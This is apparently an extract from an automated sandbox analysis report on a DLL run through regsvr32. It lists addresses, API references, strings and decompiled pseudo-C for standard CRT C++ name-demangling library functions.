0x7ffd2b06fd21
0x7ffd2b06fd2a
0x7ffd2b06fd33
0x7ffd2b06fd38
0x7ffd2b06fd3c
0x7ffd2b06fd41
0x7ffd2b06fd49
0x7ffd2b06fd5a
0x7ffd2b06fd5f
0x7ffd2b06fd68
0x7ffd2b06fd74
0x7ffd2b06fd78
0x7ffd2b06fd7b
0x7ffd2b06fd83
0x7ffd2b06fd90
0x7ffd2b06fd97
0x7ffd2b06fd9b
0x7ffd2b06fda0
0x7ffd2b06fdac
0x7ffd2b06fdb1
0x7ffd2b06fdb6
0x7ffd2b06fdbb
0x7ffd2b06fdc4
0x7ffd2b06fdcd
0x7ffd2b06fdd6
0x7ffd2b06fdde
0x7ffd2b06fde7
0x7ffd2b06fdec
0x7ffd2b06fdf1
0x7ffd2b06fdf9
0x7ffd2b06fdfe
0x7ffd2b06fe09
0x7ffd2b06fe0e
0x7ffd2b06fe11
0x7ffd2b06fe1a
0x7ffd2b06fe20
0x7ffd2b06fe24
0x7ffd2b06fe30
0x7ffd2b06fe3c
0x7ffd2b06fe48
0x7ffd2b06fe52
0x7ffd2b06fe55
0x7ffd2b06fe5a
0x7ffd2b06fe61
0x7ffd2b06fe69
0x7ffd2b06fe76
0x7ffd2b06fe87
0x7ffd2b06fe8a
0x7ffd2b06fe92
0x7ffd2b06fe9b
0x7ffd2b06fe9f
0x7ffd2b06fea4
0x7ffd2b06fea8
0x7ffd2b06feb4
0x7ffd2b06fec0
0x7ffd2b06feca
0x7ffd2b06fecf
0x7ffd2b06feda
0x7ffd2b06fedf
0x7ffd2b06fee2
0x7ffd2b06feeb
0x7ffd2b06feed
0x7ffd2b06fefd
0x7ffd2b06ff0d
0x7ffd2b06ff19
0x7ffd2b06ff1f
0x7ffd2b06ff26
0x7ffd2b06ff2c
0x7ffd2b06ff32
0x7ffd2b06ff38
0x7ffd2b06ff3e
0x7ffd2b06ff44
0x7ffd2b06ff49
0x7ffd2b06ff4e
0x7ffd2b06ff53
0x7ffd2b06ff58
0x7ffd2b06ff5d
0x7ffd2b06ff66
0x7ffd2b06ff73
0x7ffd2b06ff80
0x7ffd2b06ff83
0x7ffd2b06ff88
0x7ffd2b06ff8d
0x7ffd2b06ff91
0x7ffd2b06ff96
0x7ffd2b06ff9e
0x7ffd2b06ffa6
0x7ffd2b06ffb2
0x7ffd2b06ffb5
0x7ffd2b06ffba
0x7ffd2b06ffbf
0x7ffd2b06ffc7
0x7ffd2b06ffcc
0x7ffd2b06ffd0
0x7ffd2b06ffd9
0x7ffd2b06ffde
0x7ffd2b06ffeb
0x7ffd2b06fff3
0x7ffd2b070000
0x7ffd2b070005
0x7ffd2b07000a
0x7ffd2b070017
0x7ffd2b07002e
0x7ffd2b070033
0x7ffd2b07003e
0x7ffd2b070047
0x7ffd2b07004d
0x7ffd2b070068

APIs

DName::operator=.LIBCMT ref: 00007FFD2B06FCB7
DName::operator=.LIBCMT ref: 00007FFD2B06FD5A
DName::DName.LIBCMT ref: 00007FFD2B06FD7B
DName::operator=.LIBCMT ref: 00007FFD2B06FD9B
UnDecorator::getECSUDataType.LIBCMT ref: 00007FFD2B06FE09
DName::operator+=.LIBCMT ref: 00007FFD2B06FE9F
UnDecorator::getECSUDataType.LIBCMT ref: 00007FFD2B06FEDA
DName::operator=.LIBCMT ref: 00007FFD2B06FEFD
DName::operator+=.LIBCMT ref: 00007FFD2B06FF0D
DName::DName.LIBCMT ref: 00007FFD2B06FF73
DName::operator+=.LIBCMT ref: 00007FFD2B06FF88
DName::DName.LIBCMT ref: 00007FFD2B06FFA6
DName::operator+=.LIBCMT ref: 00007FFD2B06FFBA
DName::operator+=.LIBCMT ref: 00007FFD2B06FFC7
DName::operator=.LIBCMT ref: 00007FFD2B06FFEB
DName::operator+=.LIBCMT ref: 00007FFD2B070000
DName::operator=.LIBCMT ref: 00007FFD2B070017
DName::operator+=.LIBCMT ref: 00007FFD2B070051

Strings

__int32, xrefs: 00007FFD2B06FDC6
UNKNOWN, xrefs: 00007FFD2B06FE29
float, xrefs: 00007FFD2B06FCAC
double, xrefs: 00007FFD2B06FF02
__int16, xrefs: 00007FFD2B06FDA5
__int128, xrefs: 00007FFD2B06FDCF
char, xrefs: 00007FFD2B06FCDC
__w64 , xrefs: 00007FFD2B06FD6D
bool, xrefs: 00007FFD2B06FEAD
signed , xrefs: 00007FFD2B06FF68
volatile, xrefs: 00007FFD2B06FFF5
unsigned , xrefs: 00007FFD2B06FF5F
__int64, xrefs: 00007FFD2B06FDBD
wchar_t, xrefs: 00007FFD2B06FE35
long , xrefs: 00007FFD2B06FEF2
const, xrefs: 00007FFD2B06FFE0
<unknown>, xrefs: 00007FFD2B06FE41
int, xrefs: 00007FFD2B06FCCA
__int8, xrefs: 00007FFD2B06FD4F
short, xrefs: 00007FFD2B06FCD3
volatile, xrefs: 00007FFD2B07000C
long, xrefs: 00007FFD2B06FCC1
void, xrefs: 00007FFD2B06FEB9

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::operator+=$Name::operator=$NameName::$DataDecorator::getType
String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $bool$char$const$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
API String ID: 849544831-2219450993
Opcode ID: 0be29c5bb97f33417888a65445ecab1c43a24303d5b246c34b3fb3a8426b1cd2
Instruction ID: c30fbaf8afe4c01106359d9342708bb98317ac3aa434b23bdb9f0679714ff590
Opcode Fuzzy Hash: 0be29c5bb97f33417888a65445ecab1c43a24303d5b246c34b3fb3a8426b1cd2
Instruction Fuzzy Hash: D5C16E61F0AA478CFB629764DE622BC2361AF13394F545132DA0E455F6EFECE584A3C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06C0D4 Relevance: 51.0, APIs: 26, Strings: 3, Instructions: 213
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 60%

			E00007FFD7FFD2B06C0D4(void* __edx, long long __rbx, signed long long* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r10, void* __r11) {
				char _t59;
				void* _t73;
				char _t93;
				void* _t96;
				void* _t102;
				char _t113;
				char _t116;
				void* _t122;
				void* _t130;
				void* _t132;
				signed long long _t133;
				signed long long _t134;
				long long _t136;
				char* _t140;
				signed long long* _t147;
				signed long long* _t152;
				signed long long* _t197;
				void* _t201;
				void* _t202;
				void* _t204;
				signed long long _t205;
				void* _t207;

				_t209 = __r11;
				_t208 = __r10;
				_t207 = __r8;
				_t199 = __rsi;
				_t179 = __rdx;
				_t136 = __rbx;
				_t132 = _t204;
				 *((long long*)(_t132 + 0x10)) = __rbx;
				 *((long long*)(_t132 + 0x18)) = __rsi;
				 *((long long*)(_t132 + 0x20)) = __rdi;
				_t202 = _t132 - 0x48;
				_t205 = _t204 - 0x140;
				_t133 =  *0x2b0c70a0; // 0xf787487f4682
				_t134 = _t133 ^ _t205;
				 *(_t202 + 0x30) = _t134;
				_t197 = __rcx;
				_t140 =  *0x2b0c9a70; // 0x0
				_t113 =  *_t140;
				 *0x2b0c9a70 = _t140 + 1;
				_t93 = _t113;
				if (_t113 - 0x44 > 0) goto 0x2b06c264;
				if (_t93 == 0x44) goto 0x2b06c2af;
				_t116 = _t93;
				if (_t116 == 0) goto 0x2b06c248;
				if (_t116 == 0) goto 0x2b06c23b;
				if (_t116 == 0) goto 0x2b06c1ef;
				_t96 = _t93 - 0x2e;
				if (_t116 != 0) goto 0x2b06c184;
				E00007FFD7FFD2B06C058(_t134, __rbx, _t205 + 0x20, __rdx, __rsi, __r10, __r11);
				E00007FFD7FFD2B06C058(_t134, _t136, _t202 - 0x50, _t179, __rsi, __r10, __r11);
				if ( *((char*)(_t205 + 0x28)) - 1 > 0) goto 0x2b06c252;
				if ( *((char*)(_t202 - 0x48)) - 1 > 0) goto 0x2b06c252;
				_t10 = _t136 + 0x64; // 0x33
				r8d = _t10;
				E00007FFD7FFD2B06A4DC(_t136, _t205 + 0x20, _t202 - 0x3f, __rsi, _t201);
				if (_t134 != 0) goto 0x2b06c198;
				_t197[1] = _t197[1] & 0xffff00ff;
				 *_t197 =  *_t197 & 0x00000000;
				_t197[1] = 2;
				goto 0x2b06c411;
				_t59 =  *((intOrPtr*)(_t202 - 0x3f));
				 *((char*)(_t202 - 0x40)) = _t59;
				if (_t59 != 0x2d) goto 0x2b06c1ae;
				 *((char*)(_t202 - 0x3e)) = 0x2e;
				 *((char*)(_t202 - 0x3f)) =  *((intOrPtr*)(_t202 - 0x3e));
				goto 0x2b06c1b2;
				 *((char*)(_t202 - 0x3f)) = 0x2e;
				E00007FFD7FFD2B06A9E0(_t205 + 0x50, _t202 - 0x40);
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x20], xmm0");
				E00007FFD7FFD2B06AF5C(0x65, _t113, _t134, _t136, _t205 + 0x20, _t199, _t207);
				asm("movups xmm5, [esp+0x20]");
				asm("movdqu [edi], xmm5");
				_t147 = _t197;
				E00007FFD7FFD2B06AC78(_t134, _t147, _t202 - 0x50);
				goto 0x2b06c411;
				if ( *_t147 != 0x40) goto 0x2b06c212;
				 *0x2b0c9a70 =  &(_t147[0]);
				E00007FFD7FFD2B06A9E0(_t197, "NULL");
				goto 0x2b06c411;
				E00007FFD7FFD2B06E43C(_t113,  *_t147 - 0x40, _t136, _t202 - 0x70, "NULL", _t197, _t199, _t207, __r10, __r11);
				_t137 = _t134;
				E00007FFD7FFD2B06A9E0(_t205 + 0x70, 0x2b08393c);
				asm("movups xmm0, [eax]");
				asm("movdqu [edi], xmm0");
				goto 0x2b06c1e2;
				_t152 = _t197;
				E00007FFD7FFD2B06C058(_t134, _t134, _t152, _t134, _t199, __r10, __r11);
				goto 0x2b06c411;
				 *0x2b0c9a70 = _t152 - 1;
				E00007FFD7FFD2B06A490(1, _t134, _t197);
				goto 0x2b06c411;
				_t122 = _t96 - 0x45;
				if (_t122 == 0) goto 0x2b06c409;
				if (_t122 <= 0) goto 0x2b06c184;
				if (_t96 - 0x4a <= 0) goto 0x2b06c349;
				if (_t96 == 0x51) goto 0x2b06c2af;
				if (_t96 != 0x52) goto 0x2b06c184;
				r8d = 0;
				E00007FFD7FFD2B06D0E0(_t102, 0, _t113, _t134, _t202 - 0x50, _t197, _t199, _t207, _t208, _t209);
				E00007FFD7FFD2B06C058(_t134, _t134, _t205 + 0x20, _t134, _t199, _t208, _t209);
				asm("movups xmm5, [ebp-0x50]");
				asm("movdqu [edi], xmm5");
				goto 0x2b06c411;
				E00007FFD7FFD2B06C058(_t134, _t137, _t205 + 0x20, _t134, _t199, _t208, _t209);
				if (( *0x2b0c9a8c & 0x00004000) == 0) goto 0x2b06c2f7;
				r8d = 0x10;
				_t73 = E00007FFD7FFD2B0750DC(E00007FFD7FFD2B06A4DC(_t137, _t205 + 0x20, _t202 - 0x50, _t199), _t202 - 0x50);
				 *0x2b0c9a90();
				if (_t134 == 0) goto 0x2b06c2f7;
				goto 0x2b06c205;
				if (sil != 0x44) goto 0x2b06c340;
				E00007FFD7FFD2B06A9E0(_t205 + 0x30, "`template-parameter");
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x50], xmm0");
				E00007FFD7FFD2B06AC78(_t134, _t202 - 0x50, _t205 + 0x20);
				asm("movups xmm5, [ebp-0x50]");
				asm("movdqu [edi], xmm5");
				E00007FFD7FFD2B06AFE0(_t73, _t113, _t134, _t137, _t197, "\'", _t199, _t207);
				goto 0x2b06c411;
				goto 0x2b06c309;
				E00007FFD7FFD2B06A9A8(0x7b, _t134, _t205 + 0x20);
				if (sil - 0x48 < 0) goto 0x2b06c384;
				_t130 = sil - 0x4a;
				if (_t130 > 0) goto 0x2b06c384;
				E00007FFD7FFD2B06E43C(_t113, _t130, _t137, _t205 + 0x40, "`non-type-template-parameter", _t197, _t199, _t207, _t208, _t209);
				E00007FFD7FFD2B06AC78(_t134, _t205 + 0x20, _t134);
				E00007FFD7FFD2B06AF5C(0x2c, _t113, _t134, _t137, _t205 + 0x20, _t199, _t207);
				if (_t130 == 0) goto 0x2b06c3bc;
				if (_t130 == 0) goto 0x2b06c399;
				if (_t130 == 0) goto 0x2b06c3de;
				if (_t130 == 0) goto 0x2b06c3bc;
				if (_t130 != 0) goto 0x2b06c3f4;
				E00007FFD7FFD2B06C058(_t134, _t137, _t205 + 0x60, _t134, _t199, _t208, _t209);
				E00007FFD7FFD2B06AC78(_t134, _t205 + 0x20, _t134);
				E00007FFD7FFD2B06AF5C(0x2c, _t113, _t134, _t137, _t205 + 0x20, _t199, _t207);
				E00007FFD7FFD2B06C058(_t134, _t137, _t202 - 0x80, _t134, _t199, _t208, _t209);
				E00007FFD7FFD2B06AC78(_t134, _t205 + 0x20, _t134);
				E00007FFD7FFD2B06AF5C(0x2c, _t113, _t134, _t137, _t205 + 0x20, _t199, _t207);
				E00007FFD7FFD2B06C058(_t134, _t137, _t202 - 0x60, _t134, _t199, _t208, _t209);
				E00007FFD7FFD2B06AC78(_t134, _t205 + 0x20, _t134);
				asm("movups xmm0, [esp+0x20]");
				asm("movdqu [edi], xmm0");
				E00007FFD7FFD2B06AF5C(0x7d, _t113, _t134, _t137, _t197, _t199, _t207);
				goto 0x2b06c411;
				E00007FFD7FFD2B06E43C(_t113, _t130, _t137, _t197, _t134, _t197, _t199, _t207, _t208, _t209);
				return E00007FFD7FFD2B064980(_t73,  *(_t202 + 0x30) ^ _t205, _t134, _t207);
			}

0x7ffd2b06c0d4
0x7ffd2b06c0d4
0x7ffd2b06c0d4
0x7ffd2b06c0d4
0x7ffd2b06c0d4
0x7ffd2b06c0d4
0x7ffd2b06c0d4
0x7ffd2b06c0d7
0x7ffd2b06c0db
0x7ffd2b06c0df
0x7ffd2b06c0e4
0x7ffd2b06c0e8
0x7ffd2b06c0ef
0x7ffd2b06c0f6
0x7ffd2b06c0f9
0x7ffd2b06c0fd
0x7ffd2b06c100
0x7ffd2b06c107
0x7ffd2b06c10d
0x7ffd2b06c114
0x7ffd2b06c119
0x7ffd2b06c122
0x7ffd2b06c128
0x7ffd2b06c12a
0x7ffd2b06c133
0x7ffd2b06c13b
0x7ffd2b06c141
0x7ffd2b06c143
0x7ffd2b06c14a
0x7ffd2b06c153
0x7ffd2b06c15d
0x7ffd2b06c167
0x7ffd2b06c16d
0x7ffd2b06c16d
0x7ffd2b06c17a
0x7ffd2b06c182
0x7ffd2b06c184
0x7ffd2b06c18b
0x7ffd2b06c18f
0x7ffd2b06c193
0x7ffd2b06c198
0x7ffd2b06c19b
0x7ffd2b06c1a0
0x7ffd2b06c1a5
0x7ffd2b06c1a9
0x7ffd2b06c1ac
0x7ffd2b06c1ae
0x7ffd2b06c1bb
0x7ffd2b06c1c7
0x7ffd2b06c1ca
0x7ffd2b06c1d0
0x7ffd2b06c1d5
0x7ffd2b06c1de
0x7ffd2b06c1e2
0x7ffd2b06c1e5
0x7ffd2b06c1ea
0x7ffd2b06c1f2
0x7ffd2b06c1fe
0x7ffd2b06c208
0x7ffd2b06c20d
0x7ffd2b06c216
0x7ffd2b06c227
0x7ffd2b06c22a
0x7ffd2b06c232
0x7ffd2b06c235
0x7ffd2b06c239
0x7ffd2b06c23b
0x7ffd2b06c23e
0x7ffd2b06c243
0x7ffd2b06c24b
0x7ffd2b06c25a
0x7ffd2b06c25f
0x7ffd2b06c264
0x7ffd2b06c267
0x7ffd2b06c26d
0x7ffd2b06c276
0x7ffd2b06c27f
0x7ffd2b06c284
0x7ffd2b06c28e
0x7ffd2b06c293
0x7ffd2b06c29d
0x7ffd2b06c2a2
0x7ffd2b06c2a6
0x7ffd2b06c2aa
0x7ffd2b06c2b4
0x7ffd2b06c2c3
0x7ffd2b06c2ce
0x7ffd2b06c2dd
0x7ffd2b06c2e4
0x7ffd2b06c2ed
0x7ffd2b06c2f2
0x7ffd2b06c300
0x7ffd2b06c309
0x7ffd2b06c317
0x7ffd2b06c31a
0x7ffd2b06c31f
0x7ffd2b06c324
0x7ffd2b06c332
0x7ffd2b06c336
0x7ffd2b06c33b
0x7ffd2b06c347
0x7ffd2b06c350
0x7ffd2b06c359
0x7ffd2b06c35b
0x7ffd2b06c35f
0x7ffd2b06c366
0x7ffd2b06c373
0x7ffd2b06c37f
0x7ffd2b06c387
0x7ffd2b06c38b
0x7ffd2b06c38f
0x7ffd2b06c393
0x7ffd2b06c397
0x7ffd2b06c39e
0x7ffd2b06c3ab
0x7ffd2b06c3b7
0x7ffd2b06c3c0
0x7ffd2b06c3cd
0x7ffd2b06c3d9
0x7ffd2b06c3e2
0x7ffd2b06c3ef
0x7ffd2b06c3f4
0x7ffd2b06c3fe
0x7ffd2b06c402
0x7ffd2b06c407
0x7ffd2b06c40c
0x7ffd2b06c438

APIs

UnDecorator::getSignedDimension.LIBCMT ref: 00007FFD2B06C14A
DName::DName.LIBCMT ref: 00007FFD2B06C1BB
DName::operator+=.LIBCMT ref: 00007FFD2B06C1D0
DName::DName.LIBCMT ref: 00007FFD2B06C309
DName::operator+=.LIBCMT ref: 00007FFD2B06C31F
DName::operator+=.LIBCMT ref: 00007FFD2B06C336
DName::DName.LIBCMT ref: 00007FFD2B06C350
DName::operator+=.LIBCMT ref: 00007FFD2B06C373
DName::operator+=.LIBCMT ref: 00007FFD2B06C37F
UnDecorator::getSignedDimension.LIBCMT ref: 00007FFD2B06C39E
DName::operator+=.LIBCMT ref: 00007FFD2B06C3AB
DName::operator+=.LIBCMT ref: 00007FFD2B06C3B7
UnDecorator::getSignedDimension.LIBCMT ref: 00007FFD2B06C153

Part of subcall function 00007FFD2B06C058: DName::DName.LIBCMT ref: 00007FFD2B06C0A5
Part of subcall function 00007FFD2B06C058: DName::operator+=.LIBCMT ref: 00007FFD2B06C0B7

DName::operator+=.LIBCMT ref: 00007FFD2B06C1E5
DName::DName.LIBCMT ref: 00007FFD2B06C208
DName::DName.LIBCMT ref: 00007FFD2B06C22A
UnDecorator::getSignedDimension.LIBCMT ref: 00007FFD2B06C23E
UnDecorator::getZName.LIBCMT ref: 00007FFD2B06C293
UnDecorator::getSignedDimension.LIBCMT ref: 00007FFD2B06C29D
UnDecorator::getSignedDimension.LIBCMT ref: 00007FFD2B06C2B4
UnDecorator::getSignedDimension.LIBCMT ref: 00007FFD2B06C3C0
DName::operator+=.LIBCMT ref: 00007FFD2B06C3CD
DName::operator+=.LIBCMT ref: 00007FFD2B06C3D9
UnDecorator::getSignedDimension.LIBCMT ref: 00007FFD2B06C3E2
DName::operator+=.LIBCMT ref: 00007FFD2B06C3EF
DName::operator+=.LIBCMT ref: 00007FFD2B06C402

Strings

`template-parameter, xrefs: 00007FFD2B06C302
NULL, xrefs: 00007FFD2B06C1F7
`non-type-template-parameter, xrefs: 00007FFD2B06C340

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::operator+=$Decorator::get$DimensionSigned$Name$Name::
String ID: NULL$`non-type-template-parameter$`template-parameter
API String ID: 2293539798-3328097798
Opcode ID: ed8b0f3eb4fcedb6b4c3dbaf5ab361220a74bc801824360ca2a66b49b12322c4
Instruction ID: 402386ef1e7fe1215362e58f8b363cfd0c110f2c3a0e5a7c7697281b2abfe62c
Opcode Fuzzy Hash: ed8b0f3eb4fcedb6b4c3dbaf5ab361220a74bc801824360ca2a66b49b12322c4
Instruction Fuzzy Hash: 26A1A721F0E65789FB32EB65DE622BC2360BF56344F844131DA4D066B6DFACE145E780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06E6CC Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 235
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 48%

			E00007FFD7FFD2B06E6CC(void* __edx, void* __esi, long long __rbx, signed long long* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, void* __r11) {
				void* _t53;
				void* _t79;
				void* _t98;
				void* _t106;
				void* _t116;
				char* _t117;
				char* _t118;
				char* _t119;
				intOrPtr _t120;
				char* _t121;
				char* _t122;
				char* _t142;
				intOrPtr* _t153;
				signed long long* _t181;
				void* _t185;
				void* _t186;
				void* _t188;
				void* _t189;
				void* _t191;

				_t193 = __r11;
				_t192 = __r10;
				_t191 = __r8;
				_t183 = __rsi;
				_t98 = __esi;
				_t116 = _t188;
				 *((long long*)(_t116 + 8)) = __rbx;
				 *((long long*)(_t116 + 0x10)) = __rsi;
				 *((long long*)(_t116 + 0x18)) = __rdi;
				_t4 = _t116 - 0xc8; // -319
				_t186 = _t4;
				_t189 = _t188 - 0x1c0;
				 *__rcx =  *__rcx & 0x00000000;
				__rcx[1] = 0;
				__rcx[1] = __rcx[1] & 0xffff00ff;
				sil = 0;
				_t181 = __rcx;
				if (__rcx[1] != sil) goto 0x2b06ea20;
				_t117 =  *0x2b0c9a70; // 0x0
				if ( *_t117 == 0) goto 0x2b06ea20;
				if ( *_t117 == 0x40) goto 0x2b06ea20;
				if ( *0x2b0c9a98 == 0) goto 0x2b06e738;
				if ( *0x2b0c9a99 == 0) goto 0x2b06ea9b;
				if ( *__rcx == 0) goto 0x2b06e7a2;
				_t9 = _t186 + 0xa0; // -159
				E00007FFD7FFD2B06A9E0(_t9, "::");
				_t10 = _t186 - 0x30; // -367
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t117, _t10, _t181);
				asm("movups xmm5, [ebp-0x30]");
				asm("movdqu [edi], xmm5");
				if (sil == 0) goto 0x2b06e7a2;
				_t11 = _t186 + 0xb0; // -143
				E00007FFD7FFD2B06A9A8(0x5b, _t117, _t11);
				_t12 = _t189 + 0x40; // -63
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x40], xmm0");
				E00007FFD7FFD2B06AC78(_t117, _t12, _t181);
				asm("movups xmm5, [esp+0x40]");
				sil = 0;
				asm("movdqu [edi], xmm5");
				_t118 =  *0x2b0c9a70; // 0x0
				_t106 =  *_t118 - 0x3f;
				if (_t106 != 0) goto 0x2b06e9ea;
				_t119 = _t118 + 1;
				 *0x2b0c9a70 = _t119;
				if (_t106 == 0) goto 0x2b06e9b5;
				if (_t106 == 0) goto 0x2b06e95f;
				if (_t106 == 0) goto 0x2b06e899;
				_t84 =  *_t119 - 7;
				if (_t106 == 0) goto 0x2b06e95f;
				if ( *_t119 - 7 == 8) goto 0x2b06e850;
				_t13 = _t186 + 0x40; // -255
				E00007FFD7FFD2B06B32C(0, _t119, __rbx, _t13, _t181, __rsi, __r10, __r11);
				_t14 = _t186 + 0x80; // -191
				_t125 = _t119;
				_t53 = E00007FFD7FFD2B06A9A8(0x60, _t119, _t14);
				_t15 = _t186 - 0x10; // -335
				E00007FFD7FFD2B069EC8(_t53, _t15);
				_t16 = _t186 - 0x10; // -335
				E00007FFD7FFD2B06AC78(_t119, _t16, _t119);
				_t17 = _t189 + 0x60; // -31
				asm("movaps xmm5, [ebp-0x10]");
				asm("movdqa [esp+0x60], xmm5");
				E00007FFD7FFD2B06AF5C(0x27, _t98, _t119, _t119, _t17, _t183, _t191, _t185);
				_t18 = _t186 - 0x20; // -351
				asm("movaps xmm5, [esp+0x60]");
				asm("movdqa [ebp-0x20], xmm5");
				E00007FFD7FFD2B06AC78(_t119, _t18, _t181);
				asm("movaps xmm5, [ebp-0x20]");
				goto 0x2b06ea13;
				 *0x2b0c9a70 =  *0x2b0c9a70 + 1;
				_t19 = _t186 + 0x60; // -223
				r8d = 0;
				E00007FFD7FFD2B06D0E0( *_t119 - 7, 1, _t98, _t119, _t19, _t181, _t183, _t191, __r10, __r11);
				_t20 = _t186 - 0x80; // -447
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x80], xmm0");
				E00007FFD7FFD2B06AF5C(0x5d, _t98, _t119, _t119, _t20, _t183, _t191);
				asm("movaps xmm5, [ebp-0x80]");
				_t21 = _t186 - 0x40; // -383
				asm("movdqa [ebp-0x40], xmm5");
				E00007FFD7FFD2B06AC78(_t119, _t21, _t181);
				sil = 1;
				asm("movaps xmm5, [ebp-0x40]");
				goto 0x2b06ea13;
				_t120 =  *0x2b0c9a70; // 0x0
				_t22 = _t120 + 1; // 0x1
				_t142 = _t22;
				if ( *_t142 != 0x5f) goto 0x2b06e8fc;
				if ( *((char*)(_t120 + 2)) != 0x3f) goto 0x2b06e8fc;
				 *0x2b0c9a70 = _t142;
				_t24 = _t186 + 0x20; // -287
				r8d = 0;
				E00007FFD7FFD2B06C7D0(0, _t125, _t24, _t181, _t183, _t191, __r10, __r11);
				_t25 = _t186 - 0x60; // -415
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x60], xmm0");
				E00007FFD7FFD2B06AC78(_t120, _t25, _t181);
				asm("movups xmm5, [ebp-0x60]");
				asm("movdqu [edi], xmm5");
				_t121 =  *0x2b0c9a70; // 0x0
				if ( *_t121 != 0x40) goto 0x2b06ea17;
				 *0x2b0c9a70 =  *0x2b0c9a70 + 1;
				goto 0x2b06ea17;
				_t26 = _t186 + 0x30; // -271
				E00007FFD7FFD2B06E43C(_t98,  *_t121 - 0x40, _t125, _t26, _t181, _t181, _t183, _t191, __r10, __r11);
				_t27 = _t186 + 0x50; // -239
				_t126 = _t121;
				E00007FFD7FFD2B06A9A8(0x60, _t121, _t27);
				_t28 = _t189 + 0x50; // -47
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x50], xmm0");
				E00007FFD7FFD2B06AC78(_t121, _t28, _t121);
				asm("movaps xmm5, [esp+0x50]");
				_t29 = _t189 + 0x70; // -15
				asm("movdqa [esp+0x70], xmm5");
				E00007FFD7FFD2B06AF5C(0x27, _t98, _t121, _t121, _t29, _t183, _t191);
				_t30 = _t186 - 0x70; // -431
				asm("movaps xmm5, [esp+0x70]");
				asm("movdqa [ebp-0x70], xmm5");
				E00007FFD7FFD2B06AC78(_t121, _t30, _t181);
				asm("movaps xmm5, [ebp-0x70]");
				goto 0x2b06ea13;
				r8b = 0x40;
				E00007FFD7FFD2B06AA28(_t121, _t186, 0x2b0c9a70, _t183);
				_t31 = _t186 + 0x70; // -207
				E00007FFD7FFD2B06A9E0(_t31, "`anonymous namespace\'");
				_t32 = _t186 - 0x50; // -399
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x50], xmm0");
				E00007FFD7FFD2B06AC78(_t121, _t32, _t181);
				asm("movups xmm5, [ebp-0x50]");
				asm("movdqu [edi], xmm5");
				_t153 =  *0x2b0c9a60; // 0x0
				if ( *_t153 == 9) goto 0x2b06ea17;
				E00007FFD7FFD2B06A67C(_t121, _t121, _t153, _t186, _t191);
				goto 0x2b06ea17;
				 *0x2b0c9a70 =  *0x2b0c9a70 - 1;
				_t33 = _t186 + 0x90; // -175
				r8d = 0;
				E00007FFD7FFD2B06D0E0( *_t119 - 7, 1, _t98, _t126, _t33, _t181, _t183, _t191, _t192, _t193);
				_t34 = _t189 + 0x30; // -79
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t121, _t34, _t181);
				asm("movups xmm5, [esp+0x30]");
				goto 0x2b06ea13;
				_t35 = _t186 + 0x10; // -303
				r8d = 0;
				E00007FFD7FFD2B06D0E0( *_t119 - 7, 1, _t98, _t126, _t35, _t181, _t183, _t191, _t192, _t193);
				_t36 = _t189 + 0x20; // -95
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x20], xmm0");
				E00007FFD7FFD2B06AC78(_t121, _t36, _t181);
				asm("movups xmm5, [esp+0x20]");
				asm("movdqu [edi], xmm5");
				goto 0x2b06e703;
				_t122 =  *0x2b0c9a70; // 0x0
				if ( *_t122 == 0) goto 0x2b06ea42;
				if ( *_t122 == 0x40) goto 0x2b06ea9b;
				_t181[1] = _t181[1] & 0xffff00ff;
				 *_t181 =  *_t181 & 0x00000000;
				_t181[1] = 2;
